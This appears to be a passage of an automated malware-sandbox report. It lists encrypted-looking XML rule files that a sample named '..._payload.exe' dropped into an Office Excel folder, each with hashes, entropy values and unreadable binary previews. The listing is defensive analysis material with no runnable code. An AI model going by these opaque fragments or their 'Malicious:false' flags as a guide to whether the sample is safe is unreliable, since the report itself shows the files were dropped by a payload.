                                                                                                      SHA-512:759717EFBC96FD01E8B333CBC3A2F4B2F3C5FE576ADE3D62084E9F2ABF769DC86D28682DDFF599FB16593B1F18C0785F69C78568D86924ED184E0FBBC1DEFD54
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..J|'n.RE...S5.=..H.A|.n....h.+.4l<...j..V.BEJ.......'...<u..Cy..`....y..-.T.3...R... ............{B...L....n..'......t.?.....g.`.../.........&[JF.-...a.^{P.o -.FC........M"..%c.m..7...9..EM....5.................u.......5.Y..6.u.....,.sz..3.P/].Q6.lE..uY....%.3}+.'..$.X.."u<0(.-..h.H....?O...%D}.....[S...`.q.....uC.$...l.........ZlC.Wh....7D.h.....sl^..Bj|Omf...m.O.VysL...'.v@be.%a..;u._.D.....:.V.Q*.<.|.D.C.g..-c.....w.\..|....7.[...AUf....6......J...........OV..I.#....|"....z.....|O.].vOq.j.~K.b.$.u.7 u...._..2[......B.e..-..|.F$......5.e...3Y.(x.]G...G..qq.I....]..._.Sy...R=...[9.]...y.!.w5.j.~.V..E..i..eC..s...5ok..k......`..1ss.....@.6b......]y..(.z.L.4.^.2...&o.-.O.6.K~.......d......9.3..,..QnJ..2.!....^.3.....y...5..Tk..hz3.a...k`.0C.:D.S.......=!....?R..x[..l.}.......7q.8.6s]........~..S.vo...._...K..~|.T?....c'.....}.._....^..)%]'.F)....zs..o....a...0.f.*..4.[..z.X_..b|k......>.t...(..c.h2.."a.94.%s....8.^.0=#..a.]...E6.+..../p.f\1jK

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320034v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):923
                                                                                                      Entropy (8bit):7.749907301558537
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Vq54Jly4Jx4aTVBtYazp4StMBT0tNaFY+bZwZtrd+Wv6bD:Z+mnnPp3KY+9wZp8WwD
                                                                                                      MD5:25186EF2CEFBCDCEC7BC861E0740C76A
                                                                                                      SHA1:D53D3ADCD44CC85F05D2AA3E8C9770840639FE70
                                                                                                      SHA-256:6946B905467D215BB10196E450CF31AD65DEEE55E162F57899950E83ABDF9C38
                                                                                                      SHA-512:6610756F1379B081B87D002AA8494BA5FA2D1115B539F79989D4BC0BA7B78009B37B08F803CD69DCA5B503AF4F0871FE5C6936D02AFB5A949891F41A554B51D0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.G&#.........v.....M.R<.1..L.s....2$.k.....c..~P./x..RMQ......Y...H.h+..*N2.|6...r..+c.a..F...A....\Q.O.+~....B..Vc.2......?.}...........8.....:O.$.?......(.G.d.}%....=6G,.6._.....4..Z.d..o...B._.q....S.8@...V.H..v=.i.....K.J.?.W`+Bq...W.{bN.4....pR.'..L....d..{.....].>.t..Z.v7k...:..QQ...a......(...3....F..oh.......&4.<On..2.9`.g...]....O...=.f}....f.x.G...u..".7:^..)v..=..1.f......4".)....F.H.......71..S..x...s.Kf.G.. .....y..w.e.m..n..@...h..[h...j4.i0.8E....ve`).5O.(...........t(.....v....N?.\3B.HrN..k.../.xt..j.0k.>.5.]........6.g......c.....D."l.j..Pe.<..|.T^......X.p$L......rP0....g&...5.PY...8<.q.=`Wyk...A.e...._.|q.]e.Q.. W.|p.....0..e.t.-i...H.....$6P@...j...kX.4FRmnrqE.F....>."........Q....d~2@.....[..IKV.^]...%5..i....m=.L%I...f0!.x&.8.T<I....u....|.N..}..36t%.....L.de.(.? .......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320035v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1413
                                                                                                      Entropy (8bit):7.879880206213774
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:o8wguBEUa1xdbju48VXRE5wW8deVdyhPizbouLEacBqw9Ow2q5v6bD:Q/6xdUXRi0deOh6zU4ErQwF2q5wD
                                                                                                      MD5:C661A3A4C2B28C4319ED8C9431FF3E17
                                                                                                      SHA1:6B12A2CA6BFF986BD335E88C64DE966ACD179D64
                                                                                                      SHA-256:0A3921A148878EFD36DBAE292E2DE9F579903ABDE2854EE0C0E812C7229859D0
                                                                                                      SHA-512:0BDA9BA56D469DE7FC892F6FEB83C315FA4266772FAB7FB62966C7FC2BC0718AF74740040D4E833676CD45172EBFC9C3A25FFB116351B50778184EE903E32599
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml^..B0...;[.(........H..C.kw.<U.w....?.<...w.w4.I......(:...r.oBNx|vf.....(.,t.m.v..{..j+j.....^..V.<..?....t6..-.k8..D..r..0.N|.?..2$..X..M....K[...."%5f.z..k..`K..2....,........./.lmW..wK...70.`/...&Gd...;.....g.........g.I5f..k......AO....7i....8....]...$........).w.!.k....bdQ...C..V.8.cI|o~9W.Tp...I.K..s.&......]...:..jx.U.=N...'....zK...I.5X._&J.72.VR.\y...`..!a.c.8..z..S...C}.........z.`-,7...yZn{.......H..K./.%..l^.`...r...n:g?Wr....M..<'..+..m..x.....kV.G......) ....H....9..Qs.n...4.c^..`b....mx.H.U..<*...hR5.y.pP.P..W.8..d.l.m.z.rk..3T.V...Y.'.....rK...W..:e._%..(l3c......."!..... T....u.....B...-Hg.........os.....1s%..[...}.H...d.l:...;+....8.T-....)W..%M.7V..}.o...v^....I.C.vx....S.S5...Y...Rg.j.z..F...J...+....X(.\6.]..,p...,(..P...!.....4....._n.?%7.#.%.j..i.j"6.....rU.am"....6.j..!n.OOQ<.....d.@.a+.....<$l...7..6....QP.U.....}..z._.E...{.....Q.W+.'........../.F..s.A.uL@..i.w.8:..Ht.R.&[.AP..i%.>..z.......'...?.......%o..F.....1.;wS..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322001v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1000
                                                                                                      Entropy (8bit):7.763918367703343
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:EmuoBYfFhm2ae9iwxS/ql94rQ37exZmeGzbreeNk7pv6bD:DYdhrX9/US34uaE33O7pwD
                                                                                                      MD5:9B3777F9A1CA686DD914EEE99C86A731
                                                                                                      SHA1:D90C7AC742CAFEE400BEBB3CBF9FB5322F17B982
                                                                                                      SHA-256:34186C99F96FADD6CF214AC8F1A6A2E205A4C0FE412DEEC5D213C09FF70B95ED
                                                                                                      SHA-512:D20159E9F83E4344A7B7748891645A319CD09B41AEF2A6A7EF39ED625C91501E254D4A8181D5F20474F47F56AE93FDBE167CAD7FDE61384F16B7C186513BA925
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....;^..#{.VT..E.....v...[..?)C..^..'V..B..Bu.Y.2.... ..cC.o *.cT0la.$.N.......w...HiR^;!...#(.4..s7e.te.V.!..#.. ...V.lJ.q.x....b.{=h......s..U.g..Up.Hq....b...8.Lh.M.W.......2Zx..T.o..........D.{..1+.......xX..O..^.q........VO..%..?k.9w."..p.!.6..|E..X=......G..z.b&u..7"u..R..U.NqUC.S&I.kK.r6....ei4...e.=.U....]j..*DjY...4F.s..|OZIE...}o.X.z..:.u..F...R...K.?)2."z].....z.a~=.E.......U....I~p.!.9..eT.....;G..mSy..^..?x`...7.m.A...o(...A..(..U.A.He....E...Gh..(..Z.q!..C...+...]:......'....&.jP.....'.B......Cqk..Q..([O....C.!%......-.Z!B~....&.C.x...-h*?.'.@>i?..E.c......Bn.=..l......J....6.w.[.(.=..X.7Ss..)M.....%..):/~..&...W.G.S....Q9F../...d.}.z|.}..l..2..m3u>.+4....8>ou.=.7.O>..J.......N..l.5....U..f...S>!...0qPM.......*....d...J'hGm'{t.~.............e]......@.z.;..9R.O.M.5.E.6.e7.8a.."..O.......+H.....x(.&.... ..;..h'.:Z....j3.d.3^.?.`.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322004v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1133
                                                                                                      Entropy (8bit):7.7902975015024944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:c0gUV5vgRcYlDml/1NBOS9CE3wswHBeCoVjvA3FZT+rCnl3WB2v6bD:exC6DI1vFv3+eh7A3FnnxnwD
                                                                                                      MD5:5C5A9C30324AFF50FA431B5AC018D39B
                                                                                                      SHA1:7EC703420B098B3334113E90A163473ABC9B6239
                                                                                                      SHA-256:6AE416BBDAFDDB7F3F2644A6E206298F175B5DC465A14E9206925A72389C2856
                                                                                                      SHA-512:2FBC114012BAB8804955D5B722F5FDF8FADD598FCC7DBC201F3F5F8CF7905EFB4BD64F65BF6370A4022C63D58CAE3CC61F05BAFD31A6A54E0C50BA5C429C5115
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.P..[.\'...Y.".x....X..S..V.q.T.6..<p.....{.RQ..X7....N1...\.XNF..Sms._?Z...X$........w'45.G&.}.$B..7.ob /.,1.U..Ye.nG4.. ...oU\.)...P..x.....2...=h.K:7.=HF.y..Y.....#......@....I.?..8,.{..ij.r...}..6G.1x.0..O50..3{nG..t......1f.O.../.~...{...4C..xLt.|].v...h!..D.....8.Rc....=...l.<....g.C./....g..6.....[@.]..\....}....@(.V;..xS.. .q`.p-..v..)....9.z..B.R.|....!..`.M2..N.V...y`..L.p.%b...v...;...$.Z.....Zo..ba..h)h....Q..q3|...].<".!-....h....N..C}.P*w.+........c!Z.\{...?1......y%9...M.2.....~..U...kVTo.?......w..5b.\..r..UG...[am.:.z./...|.enb..z..........p...B......7...B.6....E!........V..j....$....C.....>..y.l.H.zK}l&u....z.Q..US...3c....|..P...Di.6.vm.`.?..9.......?m.D*..7B...u>.....>..PU8.B)...28w.`...A+..<.........:..Atp._.....-7.O..P.Gp%...%z..j^.-'.v.b...........1.96.B...Z.....w@.t...<.k4.....W.C.#.=.....K.#R......:..O.......a..E}?..0..}.C.d....2.....r...v._..........@H=...G...5..............8.E.].w.}P..:...D...b...O...H..2..l

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322006v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1692
                                                                                                      Entropy (8bit):7.893824534977112
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:q718qp4vOfGHV0GIjoImkY9ku/EH3jnHI5jSwD:U8YeHBIj3mX3WWX
                                                                                                      MD5:539A311C3666A308DFEECF3C0704A133
                                                                                                      SHA1:4A2E6B3E0E12B2FB4CEED5B83F27F8EB1125DF2C
                                                                                                      SHA-256:E99DC6F51CD2B1C93B1A81678003E6844EB499F7E502EC10C00E40D3C8D0C672
                                                                                                      SHA-512:9672F6EDE43999D7D6B3A7486EDDDA1DDF853CD56D6FFF7F67B7EBA735ED982D1EBEA88970E53F1AF564B6894ADEEC3C1C7EE88C470311A4DBE0153F4B441816
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..P....!w..].....=$.L....O.$L..k..*.Q..w....yEFS0....fb2.....6......l.y.|4.t...+........i.._....kq..5.h...W]....|....S.r.....&.....{..k.)_".:.<z..b.].g.../.Zw......7m..BT"..tI..(..lsET.%......h=....i..q....}..<...l....F z-......F..>4./HBQK..~.....,+1........S.../M...O61.:]B....W..Z....'...`..e..l.Y|..<..X.".?.?.i.?..Ue..6..Q.........K.....m.L9..........Vv.....M.t.MOw.J.......r5. 0Q...:..*.....E......}..X...[....)H:!....k.5.... u...S....n..f..v.*.h.n.@..W.j>.TP7.aEQ..Nl..-Q.Ty.K.w_.Y.'.p.X-.%...D..:s..b....B.F.G..1%...TU.]..~..DI.l...._v...../..@+....M........`.|..0pm642:-+.z.t...............?Rt..t2....P4..>.}......7...P.kdq......o".Od.P|...........tA.<.(.5.L......mf.P.#!..g......o].+...S.^.......>.. ..d.+A..\.......2..c...F ....M...a...?M].k..`.fOD..%k'(...\.....].../.n....]D\x0I.u>K......k.Q...9..a$..=..r!..Q.....Y'e.@.........vHg....<..5......<.n^...J:..kCQ.....).5.....,.....OvI.....Q..-s.....tR,..;.*^d2......#../..,..9..h>#g.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324001v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):846
                                                                                                      Entropy (8bit):7.722501588249518
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:n8eWG3ayqNBrd5/p42vD3nFP1dcZiGznv6bD:r37qNBx5/p42L3nXGznwD
                                                                                                      MD5:05CB7C197EA8D9EA6A6103B80F0014E1
                                                                                                      SHA1:4AF36871DACBC889421B25424D6FB75E9F0B54B0
                                                                                                      SHA-256:C88ADE9CCE7D42F7A47B712B98B11D36EB314C54AAEDCCBC49313E323AA4337C
                                                                                                      SHA-512:0FFC1682E4EEF2089C28EB8F5014D09CBECBBB3ACA8AFB39DC5C8E780B4B59DC7A885715C4296B959D2CB1894A1ABB020F7CB9FFF7E02593EE7AA8E4B182FAAC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..@A.w..........%.N9...n.X........9.R.1.y..0n0.....1....eAO.....e.......K.m...!.%.N.......'......\..|....K.z7..R9-s.><\...0 .b!..e+b.......... .....]P._..T....<.u..9{.;....X...C.3..@........l..n.I2.d....aQ....T..6?..&....7........!.z.'.r..d.9..Qk.........N...K4...mksh]9.b...|.!A......t...t:...x.Ll...>.i'....I...+.2..}............/v.Y.6.].L.....Zv.].m)9.#.c.96....|..<.q.V.B.6...;.l...1.....k.....J....q..PuV.t..1.D>^K#..I.V>..K.,.{.....r0........>....9..H\.WD5&t..1..)\2N..........Y..H..G.K.x....igGJVw..V`..vhD.h\....F7d.ul.mTVr....f.=..k..9l(..F.....n..%....S...u...... O...9..M.I....N...gz0......Rd....W..I....,.#.l.b.t-....+..ju......G....2y.:.n...7..,..5.>f.^....8..2.e#..g..RpB...SG...y.......R..v...C..Xl..._.t..fhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1197
                                                                                                      Entropy (8bit):7.811727071881725
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:WF3h4K7fTsye+8pt+xa9CSrXr/OmjTDabZutT/rky65AxmRzB1v6bD:Ghrz4ye+8ptc6/DOanatyV65AcD1wD
                                                                                                      MD5:334A5CC20C6ED28A58F534022F64379E
                                                                                                      SHA1:37F937427BFF4FBA2F3483E74A04F51E17B28FFD
                                                                                                      SHA-256:EB5258300F9FD9F8C32E4D3CB869AA99AB8D8BD19461A6A58963761C28C13350
                                                                                                      SHA-512:F805C580CA31151185EF2BDB7247C8312BB7D4689AE8E47DAB3C2417FAE7053AFFFB89545BD2E2893EA467D6873F3BC5D20E965CEF1B0746C91312A99DCC07C0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlY:..[.B:Y.:^.!.Xw. '...3.X.Wx."..<.$8D.j._G.u.|..7.Fs....dZ.H*...;.2o.....{.0i;R-....F........8..../.2.._xU..9.p.t.}7.......K.U&..~5./~i]....z!*...oYM....5u.!V"..d..D..xL.9.p.I......e..b:h _X.M.....\~k...5.a.. ...*|.@..H..D...t5Vr.U.(.....{.r.D.n..=N4Q.h....Q..."...F^..]...........<.z...5>l......HL..b...3..T.DlD...;......r......\k.........&.%.....fBu...!1i:k.ktO.8..'./.j..._K.....W...c..d.H3.\f;.........|...Y>.d..R8.$.K..n.#.z..jay.......&.a.,.1..i..6W..w..+.:..].....3;..27.. $...2.......I4.'...AVX.DK.[.....}. .a....[.d%.e.....2l....?e.P.~.Y5&.\.....c...J....M....s9.&8.Su&...A..O..`.y.....l...M.=..".D.,VY......MT.l...uU...g.$1.0x?..99...9....F.."u.7..R.....h....Ti|.*.6P..sE.....$/R4~..^..6./..<.c^X$J..gXWLx....9.....l.)..GF.}......@...0..;... ..].>k.D.X.....b...E.....Y..d2.9'H.Bp...f.M..R.}....H..s..q..`u%.......i..x...d..........3..ZHp.b0.........9...'.IIH.a.B.HJ......P.H..q..3...b.......lY...9.z..|....y\.LJ...]..........([k...\.VH..6...z..1.v

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1197
                                                                                                      Entropy (8bit):7.857189221880599
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pc1iCe6eCLI9B2EofHz9fiwbinJD9PibjnWLYAnKimwd1F2wRnzv6bD:qMC5eSIb2nfTliwbs9yUDnKitYwRnzwD
                                                                                                      MD5:36A64A973C13971D7BDD69D24E97BE3E
                                                                                                      SHA1:1007D35839AAB33DFF7F043B094E196C757C62C5
                                                                                                      SHA-256:0305417854486917A015203FFB7D87B18784F483908597F7DF594BE61087501B
                                                                                                      SHA-512:56252F467E294A5A7FC43A3D83CDDC0916A63DC7073EA534774D87F798C16BB08CAD41B8A2A321EF98D2B03F2AAA0850723D5F549AD0C9B9D7D4500950DAAE35
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlP.C`...[.......h....\.".Q....F...U.4...H..d.O.$..,.;*.T......M.h.^RAfP.;..;.#..o<.RS03..FF.......LY...f3._..-....N2........I....i.r,~y1<>..!q.....c... ...d.F.P...&..k.=...(_........*....V...U.Z..n@....=...V.....8<c..4._8.-j...Z....X.})..7.....9..n`............;[Z.H.Nwi..u.=.o..~.....<Z.t.:...Y.I.w...5.HX....^./.v..s.J.......L.....N.{...C.3.0...".B.. 7#.:.....=...i.......>.y...4.Je)...i....@..g>...........+... .K....2C.........iU..k`w.+.....k.!4........-.h9.JbX8.....y.[.9.R....P...y.\.x=.b.|*o.`.....g...+..G.m.{..$.Hi^....p.6O.2.j+?.G...$Y.7......K\ez]...ol8....uh...h..<...k..w.....}E'.E.!6..9...4.#..J...]..R. .s....\>.LB......F.i.1.........A.....`s,..V6...>A......M..j...{...wfS.P.r.0.}.",...X.l.N:.J.....Y....A..*..qD..I....H.m...".]b.ki.....Ne../..L.K.3."'...:......k...q.f....{1..u........P....N.\...\8..$m.._...K~].|=./B..J..~....f<.Q...Y.>.....l...2....>.w...O.6.U..H....\........*.?..*.$|w....K......4&.Q...9...1E1.W...+..U..{@.!y

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1197
                                                                                                      Entropy (8bit):7.851693245173968
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pP2H8bHXK0xdIcXiX+puNRBiLRbtFgK6CIU3x1Rk/O12pg4tJY00PUW7v6bD:UHEH6U+Ke+ARcHgVgH2g4tJz0PhwD
                                                                                                      MD5:4DE95BA976A0BD565B19152BA29BD423
                                                                                                      SHA1:1DFE9FFB036779222F6DF3029AE2654C3D867966
                                                                                                      SHA-256:448B86AF32337B33C70A52C573B61864D7E6393CC2B2F169D2DF3E556038896D
                                                                                                      SHA-512:CDBEAE1EF3B65029660B0DBA227F0D4E3F01BEED45E06BCCA04089F8652E1C0E7F5517C02FD38389544141DCA27AE3CAFB629B577F373465228CFE50DD5615F8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..T...{C.4$.J...)d..g.=1E\..]... &M...@.LP_.H.J..=.,o0.6....z...(G.^.8.w.....o>..RwTQ(..M.....,.r.D....e..?Z..,SV.....W...../........7s..y~...:.\....n.A.h.4"....6.......8J.q.Z....p(. V...Dh..q.M...p'...J......U...OT..&....#...])...or....D..Oy.`B...W....m]...e..2r...a..@...9L.$.e.ZD.+..Cy.....}....$.*/v.m...v.......Jz....?wI4...dl.`....O.V..m...a#.)...SY.S....).T..Ha|.......>@..8...8.C.....m...Z...Y.0.K......Y.3........r...G....!=.. \._..V......G.G....;.......|U........i.D...f.BA..Hy.)..K.......?$w.)@..1{..bV.]B.....o`....Y.Gk...BP..x...."1r.yh......(eC....s U6@.B;.....b.-}S..^.S...>....|L.r.@lw.....s.h;.9...b}..#+.V$:...2 ....xq_...G..e.....|.E....P.*..[g.9....~..$~g.....x.E.6....<:..P....z.u...j1...uj.F^.S.....&E.,..1...n}..-...._.[HS......m...L....N.P.[.C.$x.A.l.."LW...7.L[.B.@.%04.....z....+.L`o........C...G.J..Z...!....Z.|>;.....?..q.....c.H.Eo.~_4'.S..d=8.a~.p.Uc../5..Z,......~.L...0.......H........=..!.*.R...w.;t1.....P

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1079
                                                                                                      Entropy (8bit):7.798953697330581
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wxldpk5JwU7t+vXVy/JC+1tfaoPVofIahChv6bD:Mdpk5BodQJnxPVowYswD
                                                                                                      MD5:3EAA9D448A358CE9272408650D1AD2E9
                                                                                                      SHA1:508B327EE9B9EF4E41F9E63DA3F2409E02DFDC72
                                                                                                      SHA-256:6072BF5F91FD379F18DB29AB87EBBD10634A9D035F8A7334A2311359C50D6361
                                                                                                      SHA-512:D3883FEB8673B0209FB45D3E84EB75AB1009BF36350BC9383A0D4E92403E1BCF5B1AA1AE30B1DC287431BAA269FA323BAF4433612B09B0806992A45132D87622
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.:P%...7=.).W....Y-..f.k.'wKX...o.7]..'3.!.h^.>f..:...*+../..|&{&W.........K~"..q.qHT7....X......wC...N";.E.%.`...=.KY.E#d...Li.8A`.'........YU.E.U.W.......m...t+...`........C..p..~giD.lW....J.7"w..I..../......&.[.m...S.).bB..+...wj]_..-.K.n|T6..e!....n..k.H......i+...P8.I?54Q{S.M...`.....?.......9.#..o.f.d...U../..ezV..KNL.......&..@..^s..d.E-..9..oQ.....6Q.M........D.......`.../T.c...^{2Q.."-M.'......U....C.;7....Z.^/.I...h.hu.g..]....V*.....$x..|S.p.T...G....i.!D..D..R).....z..>.7YW...;Y...c..B;t..z~.v..DO..).<^.D.P......w(<..R...S....A...i`....d.......OWU]@..*cu....O(..q....v...8;k..=..8 .pi..t.q.=.#+.D..A.xD.BF(^....F&.3....].A..........l....k.....&.........V...zM.vb..r..&].5.....SWG.m...!.7..........1H..R..2...l....Kt.......S..J.3.5.....>..jFU.=..i.Dx.q.w..R...)t.*s.cY5.. .....P......sq.;......T.nv8}.tfE...\.u........m..w...z.S......v7MyQ.!..... ..E......V:..h.EPm.\.=.K0.E.i........+>...K.....Q......l....5q+L..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1079
                                                                                                      Entropy (8bit):7.802902929223732
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:4jBXNXHPf+liE2kw7nFgu4MSm+ZzTtaSZutnf+ldv6bD:uXJvXEEFZ4rtTMn4wD
                                                                                                      MD5:D3E02A40D4338F567E185079E499BE62
                                                                                                      SHA1:A07BFA17420BC3ABC39B57D47B5BC23BF64E3E50
                                                                                                      SHA-256:4F1C1935CA8B16C759C8486EB4B978D227A5E38EA035C642E19B34155B203973
                                                                                                      SHA-512:4B35A54FCB90C4DC85BC718F24F2111296A1AAE59F077BD9D6C95B369F0FB1C1C017E201291BD2575DFE9031AB841BD7A2BE4A520BC99832364DD5E4AD6255E4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml/k..cj........}..^.P=&..[+]k]^.h....%R...j].........`..d..h...[.j^. ..?q...C..|gq.W.L...z.YmF..*....4..;..|"-.....nq.O....:5..<.0....!.].i..7.......=~.....qhC..{.1+.....2V:!9...Vj.5.)...@^......e"....F...J......[[*[.3u.>9.B.wF..(...f..l.C&......H.\.?o..+.O......rH.....4.w.m...f....."QX.t.*..>F.6..K...................F`..^.<p.R6.....L.P..[Q..t.4..H..U..7.\..`.....s.....P..-.....~.A...}...LX..y.7.......w.r..."P........f..O~{'F.....@..7..N.i.)I..:....[.,...KWQ....^.%.U...,..6.2...je$?..!..5~{..@..?X....t../.\s.vb......v.....N.<yo..[.}u..x...@..&....o[.^K.-..S...j...7..{....!..~..w....x....wD..e.(..A.."..dE.W....bL0W.Y.>G."..A<MU......^+v...D..e[..J....2.|_.F.Y...W6@.Xq./.........C..%.Y.:.g"..,.1A....G..\...UZS..c.?....m....z....8.B%.3^.p.C .P.PD.*..W.&/Pm...9..9..>./..a.~.5b.R.OE.HL.2z.4..K...Ns9..L0Q/........^=.S.W.3........f..#^^.AR.l..s.p....oo2. rO4..;.E.#.7:.}.Bk.38.n..;dq..j..A.z=..<.C.$.#..Up.c..v.............{S.....\.w.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1079
                                                                                                      Entropy (8bit):7.807911437950531
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:/cJOmVCPjm3IyRAKpqtj0UcS+ZXDC2XWjLoHJb0Lv6bD:/9mIbmRJqK31CoGUpb0LwD
                                                                                                      MD5:2D8D555E87547C728DF0090573EEE694
                                                                                                      SHA1:DEF9B55DD8F3D45D35A5F465BFBDAA07FF9D9BF3
                                                                                                      SHA-256:A5E81D89B31AA9B9E67F420A2777E8BF3CF99C67656EE26FC8894D9A42FD2B08
                                                                                                      SHA-512:91972F402CAD22B2B2AA9D4BFCA9B14F81CAEC7C3DE037638A089A36D257D452D11B9EAA19227C723EE205DD3554D9A1497FCB05BEFC3753699FFF580F2BCF63
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.c.i:J........].~)|..~.....F..B..:.!...5..B..E@L.).....^$..b...qHf....y..l..4y.R.+.|@.,.|TJ.9......9E.......E{..Zm..~.=.4.vs.W.!....S.j.EI...?5.1u.).\......g.H.....-.zk.J...Z..9s....&b3..D._F.x.SL......aA...#.<`....._..T.........,5..d.x..}..70m.......C>u=._?V:....7...F..E.5.>Y....g......|..I.y..b/#![..........w32.....+.0.x..5..@~...j....p.?.HL.3&....0...C7M.[...|...j..r.\.4l.d.O....E...S.."_....>.....$...qD..:..i...........@..Hrf..?...pz,....>#..X.......8.w|.........q...,...#j...i.I...%?.......grdG..0...c.1.........1....L@.b...\..N.J...%L.LO.j.1}......ru.v..-H.....P..:E.L|.R6.|.dw..0....5.PDo3AO\@+.~D.V.^..V.*Dx.Xb(49.%....$..3Yh.h$US...t;... 4..*....a........2}...4...$8..zb.1.HJ....n..G.6/..e.z..0R..._*..........N2.vd.f.,..}.M.....u...K.....t@.)...(....^..P...Y7.c{C...gd....A..?6.5.g..#..].....!....N..w....A....I...x]7(.O^.%.S.l....<..6.....>..0..P...B%tax.E..N. ...]...r....t. ......{q..M...k.....x.Ir..v;...BF...x.a...u....-wj.Z

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324004v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
